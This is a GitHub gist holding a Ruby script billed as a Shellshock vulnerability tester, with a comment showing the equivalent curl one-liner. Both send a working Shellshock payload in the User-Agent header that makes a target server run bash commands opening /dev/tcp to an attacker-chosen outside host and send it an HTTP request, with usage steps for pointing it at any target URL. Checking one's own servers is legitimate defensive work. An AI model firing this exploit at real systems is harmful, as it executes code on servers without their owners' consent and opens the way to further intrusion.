Last active
October 13, 2017 17:33
-
-
Save rabbitt/1e002d340df411fa8832 to your computer and use it in GitHub Desktop.
Shellshock Remote Server Vulnerability Tester
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env ruby | |
| =begin | |
| This is equivalent to running the following from the command line: | |
| curl -H 'User-Agent: () { :; }; exec 3<>/dev/tcp/www.receiver-host.com/80; echo -e "GET / HTTP/1.0\nHost: www.receiver-host.com\nUser-Agent: shellshock\nReferer: vulnerable\n\n" >&3; cat <&3' https://some.host.that.might.be.vulnerable.com -o/dev/null -s | |
| To use this, do the following: | |
| 1. log into a webserver you control and have access to the access logs of, say: www.foo.com | |
| 2. tail the access log file: tail -f access_log | grep vulnerable-to-shellshocked | |
| 3. download this script and make it executable | |
| 4. run the script against a target server, say: www.bar.com | |
| ./shellshocked -t http://www.bar.com -w www.foo.com | |
| 5. check the tailing of your logs - if you see an entry pop up with "vulnerable-to-shellshocked" .. well.. update bash. | |
| Note: this script is pretty limited. Feel free to augment. | |
| =end | |
| require 'open-uri' | |
| require 'ostruct' | |
| require 'optparse' | |
| options = OpenStruct.new(target: nil, webserver: nil) | |
| OptionParser.new("Usage: #{File.basename($0)} [options]") do |parser| | |
| parser.separator '' | |
| parser.separator "Connection Options:" | |
| parser.on('-t', '--target URL', String, %Q|Host to test for shellshocked vulnerability.|) {|v| options.target = v } | |
| parser.on('-w', '--webserver FQDN', String, %Q|FQDN of where to send the GET request during vulnerability test (only supports non-ssl currently).|) {|v| options.webserver = v } | |
| parser.separator '' | |
| parser.separator 'General' | |
| parser.on_tail('-h', '--help', 'This message') { puts parser.help; exit! 0 } | |
| parser.parse! | |
| unless options.target and options.webserver | |
| puts "missing target and webserver options!" | |
| puts parser.help | |
| exit 1 | |
| end | |
| end | |
| payload = [] | |
| payload << '() { :; }' | |
| payload << "exec 3<>/dev/tcp/#{options.webserver}/80" | |
| payload << %Q|echo -e "GET / HTTP/1.0\\nHost: #{options.webserver}\\nUser-Agent: shellshock\\nReferer: vulnerable\\n\\n" >&3| | |
| payload << 'cat <&3' | |
| puts "Sending payload of:\n User-Agent: #{payload.join('; ')}" | |
| begin | |
| open(options.target, { 'User-Agent' => payload.join('; ') }) | |
| rescue OpenURI::HTTPError => e | |
| puts "Got error back - maybe successful?" | |
| puts e.message | |
| end |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment